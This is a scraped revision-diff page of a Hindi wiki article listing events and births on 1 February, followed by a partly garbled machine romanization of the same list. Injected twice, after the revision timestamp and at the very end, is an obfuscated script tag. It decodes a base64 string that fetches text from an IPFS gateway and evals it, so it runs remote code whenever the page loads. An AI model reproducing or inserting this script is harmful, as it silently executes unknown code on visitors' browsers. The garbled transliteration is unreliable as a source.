Difference between revisions of "1 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
  
 
==1 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==1 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
* [[1992]] - [[भोपाल]] के मुख्य न्यायाधीश ने यूनियन कार्बाइड के पूर्व सी ई ओ वारेन ऐन्डरसन फ़रार घोषित किया। (भोपाल गैस काण्ड)
+
* 1786 - [[लॉर्ड कार्नवालिस]] [[भारत]] के [[गवर्नर जनरल]] बने।
 +
* 1835 - [[ईस्ट इंडिया कम्पनी]] ने [[दार्जिलिंग]] को [[सिक्किम]] के पट्टे पर लिया।
 +
* 1855 - ईस्ट इंडिया रेलवे का विधिवत उद्घाटन हुआ।
 +
* [[1884]] - डाक बीमा योजना लागू हुई।
 +
* [[1908]] - पुर्तगाल नरेश कार्लास प्रथम और युवराज लुइस फिलिप की लिस्बन में हत्या हुई तथा मैनुअल द्वितीय शासक बने।
 +
* [[1924]] -‌ [[ब्रिटेन]] ने सोवियतसंघ को मान्यता प्रदान की।
 +
* [[1922]] - [[महात्मा गाँधी]] ने [[असहयोग आंदोलन]] तेज करने की जानकारी [[भारत]] के [[वायसराय]] को दी।
 +
* [[1949]] - 'प्रेस ट्रस्ट ऑफ इंडिया' ने 'एसोसिएटेड प्रेस ऑफ इंडिया' का अधिग्रहण कर लिया।
 +
* [[1956]] - [[दक्षिण अफ्रीका]] ने सोवियत संघ के वाणिज्य दूतावास के कर्मचारियों को वापिस बुलाने की माँग की।
 +
* [[1964]] - 'यूनिट ट्रस्ट' की स्थापना हुई।
 +
* [[1972]] - 'भारतीय अंतर्राष्ट्रीय विमान पतनन प्राधिकरण' का गठन हुआ।
 +
* [[1974]] - साओ पाउलो, ब्राजील में 25 मज़िल बैंक की इमारत में आग से 227 लोगों की मृत्यु हो गयी।
 +
* [[1976]] - 'राष्ट्रीय संवाद समिति समाचार' का गठन हुआ।
 +
* 1977 -
 +
** 'भारतीय तट रक्षक बल' का गठन हुआ।
 +
** [[भारत]] के पहले [[राष्ट्रीय रेल संग्रहालय दिल्ली]] की स्थापना।
 +
* [[1985]] - मोहम्मद अजहरूद्दीन ने [[कानपुर]] में शतक बनाकर लगातार तीन टेस्टों में शतक का विश्व रिकार्ड बनाया।
 +
* [[1992]] - [[भोपाल]] के मुख्य न्यायाधीश ने 'यूनियन कार्बाइड' के पूर्व सी ई ओ वारेन ऐन्डरसन फ़रार घोषित किया। (भोपाल गैस काण्ड)
 
* [[1992]] - केन्द्रशासित प्रदेश [[दिल्ली]] को नया नाम '[[राष्ट्रीय राजधानी क्षेत्र दिल्ली]]' दिया गया।
 
* [[1992]] - केन्द्रशासित प्रदेश [[दिल्ली]] को नया नाम '[[राष्ट्रीय राजधानी क्षेत्र दिल्ली]]' दिया गया।
* [[1977]] - [[भारत]] के पहले [[राष्ट्रीय रेल संग्रहालय दिल्ली]] की स्थापना।
+
* [[2003]] - अंतरिक्ष से वापिस लौटते वक़्त हुई 'कोलम्बिया यान दुर्घटना' में [[भारत]] की [[कल्पना चावला]] सहित सात अंतरिक्ष यात्री मारे गये।
* [[2009]] - चार देशों के पंजाब गोल्ड कप हॉकी टूर्नामेंट में [[भारत]] ने न्यूजीलैंड को 2-0 से हराया। मेलबर्न (आस्ट्रलिया) में भारत के महेश भूपति और सानिया मिर्ज़ा की जोड़ी ने पहली बार मिक्स्ड डबल का ख़िताब जीता।
+
* [[2005]] - [[नेपाल]] नरेश ज्ञानेंद्र ने प्रधानमंत्री शेरबहादुर देउबा को हटाकर तीन [[वर्ष]] के लिए सारे कार्यकारी अधिकार अपने पास लिए।
 +
* [[2009]] -  
 +
** चार देशों के 'पंजाब गोल्ड कप हॉकी टूर्नामेंट' में [[भारत]] ने न्यूज़ीलैंड को 2-0 से हराया।  
 +
** [[आस्ट्रेलिया|मेलबर्न, आस्ट्रेलिया]] में [[भारत]] के महेश भूपति और सानिया मिर्ज़ा की जोड़ी ने पहली बार मिक्स्ड डबल का ख़िताब जीता।
 
==1 फ़रवरी को जन्मे व्यक्ति==
 
==1 फ़रवरी को जन्मे व्यक्ति==
 
* [[1956]] - ब्रह्मनंदन, भारतीय फ़िल्म अभिनेता
 
* [[1956]] - ब्रह्मनंदन, भारतीय फ़िल्म अभिनेता

Revision as of 04:48, 1 February 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 1 faravari varsh ka 32 vaan din hai. sal mean abhi aur 333 din shesh haian. (lip varsh mean 334 din)

1 faravari ki mahattvapoorn ghatanaean

  • 1786 - l aaurd karnavalis bharat ke gavarnar janaral bane.
  • 1835 - eest iandiya kampani ne darjiliang ko sikkim ke patte par liya.
  • 1855 - eest iandiya relave ka vidhivat udghatan hua.
  • 1884 - dak bima yojana lagoo huee.
  • 1908 - purtagal naresh karlas pratham aur yuvaraj luis philip ki lisban mean hatya huee tatha mainual dvitiy shasak bane.
  • 1924 -‌ briten ne soviyatasangh ko manyata pradan ki.
  • 1922 - mahatma gaandhi ne asahayog aandolan tej karane ki janakari bharat ke vayasaray ko di.
  • 1949 - 'pres trast aauph iandiya' ne 'esosieted pres aauph iandiya' ka adhigrahan kar liya.
  • 1956 - dakshin aphrika ne soviyat sangh ke vanijy dootavas ke karmachariyoan ko vapis bulane ki maang ki.
  • 1964 - 'yoonit trast' ki sthapana huee.
  • 1972 - 'bharatiy aantarrashtriy viman patanan pradhikaran' ka gathan hua.
  • 1974 - sao paulo, brajil mean 25 mazil baiank ki imarat mean ag se 227 logoan ki mrityu ho gayi.
  • 1976 - 'rashtriy sanvad samiti samachar' ka gathan hua.
  • 1977 -
  • 1985 - mohammad ajaharooddin ne kanapur mean shatak banakar lagatar tin testoan mean shatak ka vishv rikard banaya.
  • 1992 - bhopal ke mukhy nyayadhish ne 'yooniyan karbaid' ke poorv si ee o varen aindarasan farar ghoshit kiya. (bhopal gais kand)
  • 1992 - kendrashasit pradesh dilli ko naya nam 'rashtriy rajadhani kshetr dilli' diya gaya.
  • 2003 - aantariksh se vapis lautate vaqt huee 'kolambiya yan durghatana' mean bharat ki kalpana chavala sahit sat aantariksh yatri mare gaye.
  • 2005 - nepal naresh jnaneandr ne pradhanamantri sherabahadur deuba ko hatakar tin varsh ke lie sare karyakari adhikar apane pas lie.
  • 2009 -
    • char deshoan ke 'panjab gold kap h aauki toornameant' mean bharat ne nyoozilaiand ko 2-0 se haraya.
    • melabarn, astreliya mean bharat ke mahesh bhoopati aur saniya mirza ki jo di ne pahali bar miksd dabal ka khitab jita.

1 faravari ko janme vyakti

  • 1956 - brahmanandan, bharatiy film abhineta
  • 1957 - jaiki shr aauf (jay kishan shr aauf) film abhineta
  • 1967 - shishupal nathu patale, bharatiy rajanitijn
  • 1971 - ajay jadeja, kriketar

1 faravari ko hue nidhan

1 faravari ke mahattvapoorn avasar evan utsav

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>